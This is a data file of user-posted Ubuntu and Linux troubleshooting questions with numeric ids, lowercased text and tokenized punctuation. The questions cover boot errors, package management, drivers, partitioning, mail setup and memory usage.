461709	move/rename a lot of files with specific file size	i recovered a lot of pictures ( 1000+ ) from a bad sd card . all except 75 which seems to be 'broken ' . i ran a program to get all the pictures reading at a lower level and i found out i got all the pictures including the ones that are not readable in the sd card , the problem is that they were recovered with different names and a lot are duplicated . i want to find the file ( if there 's more than one , just get the first ) in the 'good ' folder with the exact same size each file in the 'bad ' folder has , and rename it with its name . i ran this command ls -lr | egrep -v '^d ' | awk ' $ 5==5040057 { print } ' and i got this result -rw-r -- r -- 1 user user 5040057 apr 6 04:47 _mg_2443.jpg -rw-r -- r -- 1 user user 5040057 apr 6 04:47 f11146176.jpg -rw-r -- r -- 1 user user 5040057 apr 6 04:47 f12072256.jpg -rw-r -- r -- 1 user user 5040057 apr 6 04:47 f14834560.jpg edit : it does n't show in the result from the command , but the folder structure is as follows : recovery : |- bad ( containing _mg_xxxx.jpg files ) |- good ( containing fxxxxxxxx.jpg files ) where the first one _img_2443.jpg is the bad image and any of the following are good ( those are the candidates to be renamed or moved ) . so for the previous example i would like that for example file 'f11146176.jpg ' to be renamed in the good folder as '_mg_2443.jpg ' so i can check it later and replace it on the bad folder . is there a way to run a command to do that automatically for all the pictures ? thanks
461710	error file /boot/grub/i386-pc/normal.mod not found & invalid arch-dependent elf magic	i 've just installed debian wheezy on my desktop computer . the hardware components are the following : gigabyte-ga-z87-hd3-scheda-madre-socket intel-bx80646i54670k-processore-i5-4670k-haswell corsair-240-pin-sdram-scheda-memoria gigabyte-gv-n660oc-2gd-grafica-memoria-displayport when it rebooted , the computer was unable to boot , because of this error : error file /boot/grub/i386-pc/normal.mod not found . somewhere i found that this error could be fixed by using the command : cp -r /usr/lib/grub/i386-pc /boot/grub but then the error changed to : invalid arch-dependent elf magic i tried to reinstall the grub with this command more than once : sudo grub-install -- force -- boot-directory=/ /dev/sda but unsuccesfully . the error is still there . this is the partition scheme of my computer : root @ ziomario-z87-hd3 : /home/ziomario # fdisk -l disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009b447 device boot start end blocks id system /dev/sdb1 * 2048 517617663 258807808 7 hpfs/ntfs/exfat /dev/sdb2 517617664 625141759 53762048 7 hpfs/ntfs/exfat disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xae858386 device boot start end blocks id system /dev/sda1 * 2048 398817279 199407616 7 hpfs/ntfs/exfat /dev/sda2 398817280 594129779 97656250 83 linux /dev/sda3 594130942 625141759 15505409 5 extended /dev/sda5 594130944 625141759 15505408 82 linux swap / solaris
461711	multiple instance of right click	i 'm using ubuntu 14.04 when i use right click in my key board and move my mouse pointer in the launcher multiple instances of right click open up and the system suddenly gets stuck . how to fix this
461712	apt-get in lxc container is very slow on ubuntu server 12.04	i have n't had much luck in finding out the source of the issue , whether this `` issue '' is simply a limitation of lxc or zfs , or whether this issue is specific to ubuntu . the issue is quite simply that apt-get is very slow when run inside a container . apt-get hangs for about 30 seconds when reading package lists ( after i 've run apt-get update for example ) reading package lists ... 99 % it also hangs when installing new software . installing 'strace ' for example , it hangs here : setting up strace ( 4.5.20-2.3ubuntu1 ) ... i 'm using the daily build of lxc with zfs backing store . any pointers would be greatly appreciated . [ edit ] i 've done some more digging , and have found a solution with the help of a colleague . first , i used strace to figure out where it was hanging : strace apt-get update and noticed it was hanging on msync ( 0x7f02a57b1000 , 37879664 , ms_sync ... after some mindless googling and some help from a colleague i assumed this was related to disk io . so i installed and run iostat : sudo apt-get install sysstat sudo iostat -x 1 disk util was at about 90 % . this confirmed disk io bottleneck . my colleague suggested i try switch off synchronous file syncing for zfs : zfs set sync=disabled pool/fs and this solved my issues ! whether or not this is a bug or a feature is still up for debate , so i 'll leave this issue unanswered for a couple of days .
461717	how to simulate mouse clicks without installing any packages ?	i am looking for a way to simulate mouse click at the same position like 10 times per second . i know this can easily be achieved using xdotools but i am currently on a machine without the possibility to install additional software . so is there a possibility to achieve this just with a plain terminal ?
461719	how to install my netgear wnda3100v2	( i posted this with my brother 's ubuntu computer ) before you start telling me to do stuff take note that i 'm twelve so i do not have access to a-lot . my computer has ubuntu 14.04 lts . when i use lsusb in the terminal , ( i 'm only typing the port that has the adapter ) bus 001 device 007 : id 0846:9011 netgear , inc. wnda3100v2 802.11abgn [ broadcom bcm4323 ] anyway i can set this up so i can get a network connection out of it , and keep in mind that i have no internet connection right now
461724	lubuntu 14.04 black screen upon start-up	i 've installed lubuntu 14.04 on an asrock 775 vm 800 with a pentium 4 . it often boots to the lubuntu splash screen for a few seconds and then displays what appears to be a black screen . after a while the monitor reports that there is no video signal . at this point the hard drive light flashes occasionally . the video does not respond to the keyboard and mouse . there is no response to power cycling the monitor ( off then on ) . i even switched to ps/2 keyboard and ps/2 mouse to eliminate usb initialization problems but the problem happens regardless of whether the input devices are usb or ps/2 . this board is described as having the following video support : integrated unichrome pro 3d graphics . the bios seems to have a setting to specify agp or pci . neither setting makes a difference and perhaps the setting applies to plug-in video cards , of which none are present . i have swapped monitors , keyboards , mice , and installed a voltage regulator . the problem persists . very seldom does the lubuntu login screen appear , but if it does , the unit is functional and was tested with skype and firefox , so i know the os is present and common applications work . how do i resolve this black screen problem ?
461725	font hinting in ubuntu 14.04	i 'm in the process of switching from 12.04 to 14.04 on all of my machines . i 'm a bit particular about font rendering and used the app `` unsettings '' to set font hinting to none on 12.04 . however , it seems like i ca n't install unsettings on 14.04 . does anyone know a way to manipulate the way text is rendered on 14.04 ? thanks
461729	ubuntu is not detecting my android device	i am new to android . i have just downloaded and installed android sdk . now when i run the application from eclipse , my device is not getting detected . i have googled and was brought up with this as my solution , but that also did n't worked . here 's the 51-android.rules subsystems== '' usb '' , attr { idproduct } == '' 0bb4 '' , attr { idproduct } == '' 0c03 '' , mode= '' 0666 '' , group= '' plugindev '' , owner= '' < username > '' after that i rebooted my laptop , and ran this command : username @ laptopname : ~/android/adt-bundle/sdk/platform-tools $ adb devices the output i get is : * daemon not running . starting it now on port 5037 * * daemon started successfully * list of devices attached ? ? ? ? ? ? ? ? ? ? ? ? no permissions edit crazydeveloper @ crazydeveloper : ~ $ lsusb bus 002 device 004 : id 0bb4:0c03 htc ( high tech computer corp. ) bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b337 chicony electronics co. , ltd bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub crazydeveloper @ crazydeveloper : ~ $ ls -l /dev/bus/usb/004/ ls : can not access /dev/bus/usb/004/ : no such file or directory crazydeveloper @ crazydeveloper : ~ $ edit : 2 after the answer submitted here 's the output that i got : crazydeveloper @ crazydeveloper : ~ $ ls -l /dev/bus/usb/002 total 0 crw-rw-r -- 1 root root 189 , 128 may 7 09:45 001 crw-rw-r -- + 1 root root 189 , 129 may 7 09:45 002 crw-rw-rw- 1 root plugdev 189 , 130 may 7 09:48 003 i am using micromax canvas 2.2 a114 - android version 4.2.2 please help me . thanks .
461730	nautilus crashes when trying to open workgroup folder in windows network ( ubuntu 14.04 )	i 'm taking the first steps in the os ubuntu . started in ubuntu 12.04 64bit and after messing the os because of draftsight i decided to make a fresh install of ubuntu 14.04 32bit . ( draftsight works flawless ... ) in the ubuntu 12.04 i had a shared folder to my asus o ! play mediaplayer - could enter in local network via mediaplayer and see the shared folders in my computer . after this new installation of ubuntu the nautilus crashes when i try to open the `` workgroup '' folder in windows network . ( nautilus crashes sigsegv ) . also noticed in network , my computer does n't appear . like i said , this was a fresh install of 14.04 , with installation of all updates available online . recently re-installed nautilus . what is missing here ? any help would be great ! news - attempts made yesterday ( 06/05/2014 ) ran the ubuntu 14.04 install disk and made the system recovery with upgrades online . rebooted the system and ran the update notifier ; installed all the upgrades available . after tried to accesss the network - workgroup folder ; works without problem . made the first attempt to share a folder ; installed samba like the system asked , when the system asks to install libpam-smbpass ca n't give the order because the board is greyed . installed this manually by synaptic . sucessfully share a folder , try to view the shared folder in network - workgroup folder ; when i try to open the folder the nautilus crashes . verifying the nautilus files , three files are outdated : libnautilus-extension1a ; nautilus-share and nautilus-sendto . updated these with synaptic . rebooted the system and made the steps to access the shared folder , nothing happens and nautilus crash again . strange thing , in network my computer does n't appear , only `` smb-server '' am i the only one to have this problem ? thanks !
461731	how to increase the font size in dash tooltips in gnome shell	i would like to increase the font size in the tooltips , displaying when i hoover the mouse over icons in gnome shell . the tooltips displaying normally the names of the applictaions in the dash . the standart font size is small and not well readable . i tried to set some font-size properties in the gnome-shell.css file inside my theme folder , but tis does not seems to work .
461735	how to set up a linux server as a router with qos	this question is a follow-up to `` how to set up a linux server as a router ? '' but with an added prerequisite : i want to be sure , before i begin mounting a ubuntu router , that i will be able to implement qos . this is mainly to use fine-grained qos that i want a custom router in the first place so i need to be sure that it is possible . i want to use an ubuntu server machine as my home network router ( with dhcp , dmz , firewall rules ) . i also want to be able to throttle the up-link bandwidth ( to provide qos ) based on the following criteria : local ip range local mac address local port range remote ip range remote port range priority for example , i 'd like to be able to limit the bandwidth of my google drive sync ( which sync to a google ip on port 443 ) , but only if other services with higher priority needs the bandwidth . in fact , i 'd like to have a mix between streamengine qos ( that can limit bandwidth to destination ip but only work with 0..255 priority on my d-link router ) and cisco `` casual '' routers ( that allow for explicit bandwidth limit - 50kb/s for example - but only on local ip rules ) . is this possible using ubuntu server ? if so , where should i start ?
461738	dash 's `` search your computer and online sources '' stops working after a while	the dash `` search your computer and online sources '' just spins and hang . it works a few times after each reboot , but then simply stops working . if i select files or applications the dash search works , but the default one `` search your computer and online sources '' hangs with a spinning wheel . it 's been like that since 12.04 i think . 14.04 now and same problem . i have only apps and files selected under categories and sources . any idea what 's wrong ?
461741	kernel panic on new laptop	i just bought a lenovo thinkpad x1 carbon ultrabook . i ran ubuntu 14.04 from a flash drive and it worked beautifully . i then installed it and the install seemed to go well , but when i try and boot i get : kernel panic - not syncing : no working init found . try passing init= option to kernel . does anybody know how i can resolve this ? i know the os is compatible because the live version works great . here is all the relevant information : http : //paste.ubuntu.com/7405506/
461743	/etc/grub.d/09_lowlatency and /etc/grub.d/10_linux double list kernel	in a fresh ubuntu-studio 14.04 install sudo apt-get install linux-generic . then the grub-mkconfig will give you a menu as such ubuntu ( lowlatency ) ubuntu advanced options for ubuntu a quick look with the 'e ' key will show that both ubuntu ( lowlatency ) and ubuntu point to linux /boot/vmlinuz-3.13.0-24-lowlatency a work around is you can select the desired kernel in the 'advanced option for ubuntu ' menu . how can we fix /etc/grub.d/09_lowlatency and /etc/grub.d/10_linux so that they do n't select the same default kernel ? relevant menuentry in /boot/grub/grub.cfg from /etc/grub.d/09_lowlatency menuentry 'ubuntu ( lowlatency ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-0f6e1051-cf9f-4299-b691-76d0d8c532d1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 0f6e1051-cf9f-4299-b691-76d0d8c532d1 else search -- no-floppy -- fs-uuid -- set=root 0f6e1051-cf9f-4299-b691-76d0d8c532d1 fi linux /boot/vmlinuz-3.13.0-24-lowlatency root=uuid=0f6e1051-cf9f-4299-b691-76d0d8c532d1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-lowlatency } and the menu entry in /boot/grub/grub.cfg from /etc/grub.d/10_linux menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-0f6e1051-cf9f-4299-b691-76d0d8c532d1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 0f6e1051-cf9f-4299-b691-76d0d8c532d1 else search -- no-floppy -- fs-uuid -- set=root 0f6e1051-cf9f-4299-b691-76d0d8c532d1 fi linux /boot/vmlinuz-3.13.0-24-lowlatency root=uuid=0f6e1051-cf9f-4299-b691-76d0d8c532d1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-lowlatency } yes i assure you i have a normal kernel installed : $ ls -l /vmlinuz* lrwxrwxrwx 1 root root 30 may 5 20:37 /vmlinuz - > boot/vmlinuz-3.13.0-24-generic lrwxrwxrwx 1 root root 33 may 2 20:25 /vmlinuz.old - > boot/vmlinuz-3.13.0-24-lowlatency
461744	not able to update from 12.10 to 14.04	i am not able to upgrade from ubuntu 12.10 to 14.04 directly . the discussion here how will people upgrade from 12.10 to later releases after 13.04 is eol ? seems to point out that it is possible . if it possible , please let me know the steps needed to do it . the discussion here says its not possible directly can not upgrade to ubuntu 14.04 from 12.10 which is correct ?
461748	how do i change keyboard geometry from 104 to 105 keys ?	i am using ubuntu 14.04 and i have been experiencing the following issue with former releases as well . i am using a german keyboard layout . however , i am missing the key to display the pipe- / inequality-signs ( which on german keyboards is supposed to be left to the y key ) . i already tried to add or remove different german keyboard layouts using system settings but non of the layouts include this key . the best i could get so far is to have access to t he following symbols : âť and âť . however , these are not the appropriate german inequality signs plus the pipe symbol is missing . see this screenshot of my german keyboard layout :
461749	how to solve this error : cut : write error : broken pipe	i am a first ubuntu user and installed the softsearch tool and then execute the tool by using two commands : samtools index small_test.bam perl ./softsearch.pl -b small_test.bam -f chr1.small.fa but i am getting this error : cut : write error : broken pipe so please can any one tell me how do i solve this error ? https : //code.google.com/p/softsearch/ http : //galaxyproject.org/
461751	encrypt : overwrite empty disk space bad for ssd drives ?	i am installing ubuntu 14.04 and got the choices of : encrypt the new ubuntu installation for security use lvm with the new ubuntu installation if i select encrypt and go to next step , i get to write a password/passkey and then there is another choice : for more security : [ checkbox ] overwrite empty disk space there are answers to what it does in this thread - for more security : overwrite empty disk space , i.e . overwriting unused space to make it more difficult to recover data . my question is ... is this bad for ssd since it will then write more than `` needed '' ?
461754	switching java version through apt ?	( apologies in advance if my formatting is off , this is my first post , please feel free to correct me ) . normally , when i want to find out what version of java i 'm using , i run : java -version java version `` 1.7.0_55 '' if i want to change java version ( from java 7 to java 6 ) , i can just point the symlink ( /usr/bin/java ) to the corresponding jres java binary . ( we do n't need to worry about the javac compiler or java_ws here , in this instance , btw ) . # readlink -f /usr/bin/java /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java # ln -s /usr/lib/jvm/java-6-openjdk-i386/jre/bin/java /usr/bin/java # java -version java version `` 1.6.0_31 '' this is fine , and as far as i can see , it works . in solaris , there is a nice way of doing this through the pkg mediator tool : myhost # pkg mediator -h java java system 1.7 system to change java from 1.7 to 1.6 : pkg set-mediator -v 1.6 java then to confirm the changes myhost # pkg mediator -h java java local 1.6 system i 'm wondering does apt have an equivalent ? or is there a more graceful way of switching between java versions ? edit : this could also apply to python , so i 'm not looking for java-specific answers
461756	kde , how to have `` tail -f '' constantly on a dedicated panel ?	plasma has this nice plasmoid called file watcher . at work i have 2 monitors . i would like to put this plasmoid on an empty panel on the second monitor . so that tail -f /var/log/apache2/error.log would be always visibile on the panel , but unfortunately i 'm not able to make the plasmoid go on the 100 % of the panel 's with . is there a way for doing this ? workarounds and/or alternatives are welcome
461762	belarc advisor sort of program on ubuntu	is there a program that can list the installed softwares , packages and configurations files of the installed software on an ubuntu system . on windows there is a program called belarc advisor that makes a complete list of installed software together with their corresponding license keys and updates . considering a fresh reinstall i need such functionality . thanks
461772	software suddenly not starting , does n't show up in system monitor	specifically , i 'm trying to get rstudio to work on ubuntu 12.04 . yesterday it was working fine , but now when i either click or try to start it from terminal , exactly nothing happens . the prompt returns nothing , the click produces nothing . what could have caused this and how do i fix it ?
461776	`` allow executing file as program '' not working on 14.04	i have two fresh 14.04 installations and i replicated this bug on both stations : 1- open gedit and type # ! /bin/bash echo `` hello world '' 2- save as `` test.sh '' 3- right click on test.sh , tick the `` allow executing file as a program '' on the permissions tab and close 4- double click on test.sh = > ubuntu opens test.sh in gedit instead of executing it in the terminal ( it used to work on ubuntu 12.04 ) do you have the same problem ? do you know any solution ? thanks for any help
461777	latest ati drivers	i run ubuntu 14.04 and i installed the ati drivers from software update - > additional drivers but on the official ati website the latest linux beta drivers have a newer version , if that version supports kernel 3.13 can i download the drivers and install them from there since they are the latest ? thank you for your time .
461779	how to install oracle 11g express 64bit in a 32bit system ?	i am new to ubuntu/linux i want to install oracle 11g express with 32bit intel system which is dual boot with win7 . i am following apt-get installation process using : link to installation process at step 4 i am executing command : sudo alien -- scripts -d /home/sysadmin/downloads/disk1/oracle-xe-11.2.0-1.0.x86_64.rpm and getting this error : /home/sysadmin/downloads/disk1/oracle-xe-11.2.0-1.0.x86_64.rpm is for architecture amd64 ; the package can not be built on this system how to resolve this error ? is my version of oracle ( oracle-xe-11.2.0-1.0.x86_64.rpm ) proper ?
461781	issues with 14.04 lts	e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) besides software center keeps crashing . i am using 14.04 lts and it started this morning . what to do now ? should i reinstall the ubuntu ?
461783	link all haskell commands to different version	i recently installed ghc 7.8 , but now i want to go back to ghc 7.4 i installed ghc 7.8 via a binary package , but i did n't uninstall it correctly . when i run ghc , ghci or runhaskell , i get /usr/local/bin/ghc : line 9 : /usr/local/lib/ghc-7.8.2/bin/ghc : no such file or directory how do i change all these applications to point to the correct version ( 7.4 ) that 's here ? /usr/bin/ghc-7.4.1
461784	compiz annotate not working in fullscreen mode	compiz annotate not working in fullscreen mode . if i annotate/draw while in full screen mode nothing happens . then when i exit the fullscreen mode all my annotations appear . i tested gedit and chrome so far . how can i enable annotations to work while in fullscreen mode ?
461786	input language does n't change on login screen	the input language does n't change on login screen on ubuntu 14.04 when i press the key combination to change the language.i have to do it manually using the mouse.is this a bug or is there a setting in order to make it work ?
461792	how to create a folder or file using a specific user permission in ubuntu 14.04	for the instance , let 's say omar is running and logged in to the system and demo is just another user in the system . now omar wants to create a file or folder under /var/www/ using demo user 's permission . omar does n't want to create a file with as usual procedure and give permission to demo user using chmod or chown . how this can be achieved ?
461794	ubuntu does not boot via uefi but does get boot via legacy	i have a ubuntu 13.10 cd . when i try to boot using uefi it wo n't boot ( with or without secure boot ) , even if i change my boot priority . it does boot when using legacy bios mode .
461795	how to move wubi partition to a whole drive ?	i have sony vaio laptop with windows 7 home premium installed by default in it.there was only 1 drive in it , ( i.e ) the c : drive.it could contain 300 gb of memory.i split the c : drive into another e : drive.that made the laptop have 2 drives with 150 gb storage in each.i decided to put the ubuntu installation into e : drive . ( i mainly did this thing because one of my relatives told that if we keep 2 operating softwares in the same drive , it would turn out to be a bit problematic . ) now , i installed ubuntu 14.04 in the e : drive using wubi.so , it took up only 30 gb of it.now , i have decided to transfer the wubi partition completely to the e : drive and make it occupy the whole of e : drive without causing any damage to the windows partition and the c : drive.how can i do this ? any help is greatly appreciated . this is what sudo parted -l shows : model : ata hitachi hts54503 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 10.9gb 10.9gb primary ntfs diag 2 10.9gb 11.0gb 105mb primary ntfs boot 3 11.0gb 166gb 155gb primary ntfs 4 166gb 320gb 154gb extended 5 166gb 316gb 150gb logical ntfs 6 316gb 320gb 3940mb logical
461796	is there any way to echo an ssh session to a local terminal session	i am starting a server via ssh from various locations , and i want the terminal printout to be able to be viewed locally on the server , is there any way to do this ?
461800	add space from a ntfs partition to ubuntu	so , i installed ubuntu alongside my windows 8 on a 15 gb partition i took from another drive . ubuntu splitted it into 2 partitions of 7,96 gb and 7,04 gb and i realized that it 's kind of small so i want to add more space . i was thinking about trying to take space again and allocating it to those 2 partitions , but i 'm afraid something will go wrong .
461801	is it necessary to call `ssh-add` after login	i have my public key on the server , i have my personal key in ~/.ssh/identity . if i execute ssh-add and enter my private passphrase , i can ssh without a password . what i want is not to call ssh-add at all . i want to unlock the private key with the login to the system . i tried ( maybe foolishly ) import the identity file into the seahorse , but without any effect . i do n't want to have private key without a passphrase . i have ubuntu gnome 14.04 .
461807	how to set up skype on a hidpi system ?	i recently installed ubuntu 14.04 on my retina macbook pro . everything works great , and the hidpi is great in most apps . however , skype is one app that does n't scale properly . is there any way to fix this and get skype to display at the same scale that everything else does ?
461808	does ubuntu 14.04 support ssd trim on software raid ?	i 'm using the softwareraid ( mdraid ) raid1 on 2 intel ssd dc s3500 and i found there 's a fstrim job on cron.weekly . does it mean ubuntu supports it ? i could not find any article saying that ssd mdraid and fstrim is supported for raid1 . and this bug on launchpad is confusing : https : //bugs.launchpad.net/ubuntu/+source/util-linux/+bug/1276941 i tried to run fstrim manually and it works : sudo fstrim -v / / : somerandomnumber bytes were trimmed no luck with the fstrim-all as used in the cron.weekly since there 's no verbose option to run that command . https : //bugs.launchpad.net/ubuntu/+source/util-linux/+bug/1303199
461820	problems to dual boot between ubuntu 14.04 and windows 7	when i click the option to install ubuntu alongside windows 7 my system restarts and the dvd from which i am installing trusty tahr is ejected and then everything is to be started from the beginning . i have used ubuntu previously but i have never made a dual boot between ubuntu and windows please help me to get rid of this issue i have followed these steps but they did n't work : how to install ubuntu 12.04 alongside windows 7
461823	i can not install via netinstall without trusty-updates or trusty-security repositories disabled	i 'm trying the network installation ( preseed ) of trusty suite . but apparently the commands : pkgsel pkgsel/upgrade select none d-i pkgsel/upgrade select none pkgsel pkgsel/update-policy select none d-i pkgsel/update-policy select none do not work . any help ?
461824	ubuntu installed but wo n't boot	ubuntu installed and prompted for a restart . when i restarted the computer , window 7 started normally and no sign of ubuntu . when f2 is pressed during a restart windows 7 is the only os showing . how do i get ubuntu to load ?
461825	connect to wifi from command line	other posts seems to be addressing more complicated network connection issues from the command line . the unity panel network indicator/button does n't respond too well sometimes - it keeps trying to connect to a network even when i click on `` disconnect '' , stuff like that . so i want to go command line for the control . i do n't like guis anyway . is there not some simple command line tool which can do something like the following ? wifi connect mynetworknamea wifi disconnect wifi connect mynetworknameb
461829	how to send mail using postfix ?	i 'm new to ubuntu and i 've been self-learning linux administration . i installed postfix with the command sudo apt-get install postfix . now , i want to send a mail but i do n't know how to do it . when i searched the internet , some said to check my /etc/postfix/main.cf file . it contains the following : smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination myhostname = server.siva-virtual-machine.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = siva-virtual-machine , localhost.localdomain , , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all home_mailbox = maildir/ mailbox_command = smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtp_tls_security_level = may smtpd_tls_security_level = may smtpd_tls_auth_only = no smtp_tls_note_starttls_offer = yes smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev : /dev/urandom please tell me how to send a mail to myself ( like another user ) and to other 's like user @ gmail.com .
461830	problem upgrading from 12.04 to 12.10 on reboot i get a black screen only	i tried upgrading ubuntu from 12.04 lts to 12.10 since there were no other updates and after the updating at reboot there was some notice , but it went into reboot again and all i got was a blank screen . some assistance to recovering situation is much appreciated . thanks
461832	gparted resizing boot partition	so i have some unallocated space and the root partition which is pretty small . i want to add that space but it needs to move it and then grow it . i know it will take some time but i 'm more concerned about wheter it is safe or not . most of my data is backed up , but before venturing i want to know if there 's a real possibility that it will result in boot failure
461835	error message at boot 14.04 lts	14.04 starts up a bit slow ( 28s ) with an error message just prior to the desktop showing . i ran boot-repair and got this paste . ( core2 2.8 1gb video card ) http : //paste.ubuntu.com/7403015/ i just installed 14.04 my first time with linux and want to know how to correct this and whether i would be better off wiping the partitions/formatting/ ect.. to get a better install . i have the time and have no issue with re-installing every thing correctly . thank you .
461838	ca n't use a new formatted partition after formatting with gparted . permissions i guess	xubuntu 14.04 . i had a non used partition , and as my /home has become full i have had to format that unused partition . ( my desire was to merge that partition with /home as it is listed next to /home , but as home is in use i ca n't do it , i ca n't unmount it . help with this would be much desired too , even prefered , should i use a live-cd ? ) . so i have formatted with gparted that new partition as ext4 and put a name/label `` home2 '' . when i launch gparted it asks me about the computers password , so i run it with privileges . this new partition is listed in gparted as /dev/sda3 . then i open this new partition in the file manager ( thunar ) but ca n't create folders or copy there . if i list its properties it says : owner : root access : read and write group : root access : read only others : read only . some help here . thanks .
461840	ubuntu installer did n't detect my current os	when i tried to install ubuntu 14.04 , i could not find the option to install it alongside my windows 8.1 installation - why is this the case and why is this happening ? how can i fix this ?
461844	why is all my memory used up less than 24 hours after reboot ?	running ubuntu server 12.04 , meminfo shows pretty much all memory utilized : $ cat /proc/meminfo memtotal : 8173180 kb memfree : 139556 kb buffers : 1146204 kb cached : 3062088 kb swapcached : 28 kb active : 4181280 kb inactive : 2175224 kb active ( anon ) : 1824800 kb inactive ( anon ) : 329536 kb active ( file ) : 2356480 kb inactive ( file ) : 1845688 kb unevictable : 0 kb mlocked : 0 kb swaptotal : 11719380 kb swapfree : 11719068 kb dirty : 160 kb writeback : 0 kb anonpages : 2148472 kb mapped : 98200 kb shmem : 6128 kb slab : 1509448 kb sreclaimable : 1463828 kb sunreclaim : 45620 kb kernelstack : 4504 kb pagetables : 37756 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 15805968 kb committed_as : 2828504 kb vmalloctotal : 34359738367 kb vmallocused : 295632 kb vmallocchunk : 34359432032 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 195904 kb directmap2m : 8187904 kb this was just after a few hours after reboot . the memory was rapidly consumed . when i run top , the first 5 entries look like this : pid user pr ni virt res shr s % cpu % mem time+ command 20011 myuser 20 0 654m 406m 3584 s 2 5.1 3:38.71 ruby 1311 root 20 0 0 0 0 s 0 0.0 3:50.95 jbd2/sda3-8 20633 root 20 0 0 0 0 s 0 0.0 0:02.82 kworker/7:3 27547 myuser 20 0 17468 1492 1044 r 0 0.0 0:00.07 top 1 root 20 0 24728 2672 1380 s 0 0.0 0:01.28 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd so only ruby is currently utilizing memory . i can break that down further between phusion passenger ( a module for apache ) and apache : -- -- -- passenger processes -- -- -- pid vmsize private name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 4088 218.3 mb 0.3 mb passengerwatchdog 4092 1271.8 mb 2.9 mb passengerhelperagent 4099 230.6 mb 1.0 mb passengerloggingagent 7143 317.8 mb 90.3 mb passenger rackapp : /home/mysite/public_html/store.mysite.com/current 14841 654.3 mb 414.2 mb passenger rackapp : /home/mysite/public_html/staging.mysite.com/current 17393 718.3 mb 444.1 mb passenger rackapp : /home/mysite/public_html/staging.mysite.com/current 20004 526.2 mb 231.3 mb passenger rackapp : /home/mysite/public_html/staging.mysite.com/current 20011 654.1 mb 340.6 mb passenger rackapp : /home/mysite/public_html/staging.mysite.com/current 20018 462.2 mb 150.9 mb passenger rackapp : /home/mysite/public_html/staging.mysite.com/current # # # processes : 9 # # # total private dirty rss : 1675.62 mb apache workers : lynx http : //localhost/server-status total accesses : 4452 - total traffic : 19.3 mb cpu usage : u.31 s.21 cu0 cs0 - .000612 % cpu load .0524 requests/sec - 238 b/second - 4556 b/request 10 requests currently being processed , 5 idle workers _ww_w__wwww..w.w ... _w ... ... ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . $ ps aux | grep apache2 | grep -v pts | awk ' { tot += $ 6 ; procs += 1 ; print $ 2 , $ 6 , $ 11 } end { print `` total : `` , tot , '' / '' , procs , '' = '' , tot/procs } ' 4084 23068 /usr/sbin/apache2 7089 13496 /usr/sbin/apache2 11074 13668 /usr/sbin/apache2 14848 13288 /usr/sbin/apache2 16562 13508 /usr/sbin/apache2 16565 13248 /usr/sbin/apache2 17527 13832 /usr/sbin/apache2 21656 13516 /usr/sbin/apache2 23567 13508 /usr/sbin/apache2 24407 13508 /usr/sbin/apache2 25506 13256 /usr/sbin/apache2 26736 13540 /usr/sbin/apache2 26742 13288 /usr/sbin/apache2 27526 13512 /usr/sbin/apache2 27729 13036 /usr/sbin/apache2 28198 13032 /usr/sbin/apache2 total : 224304 / 16 = 14019 as you can see , no way apache/phusion passenger are utilizing almost 8 gb of ram . what could be going on here ?
461846	no lubuntu 14.04lts unetbootin ?	i have use synaptic package manager to download unetbootin but no live version of lubuntu 14.04 lts is listed ? or is it me ?
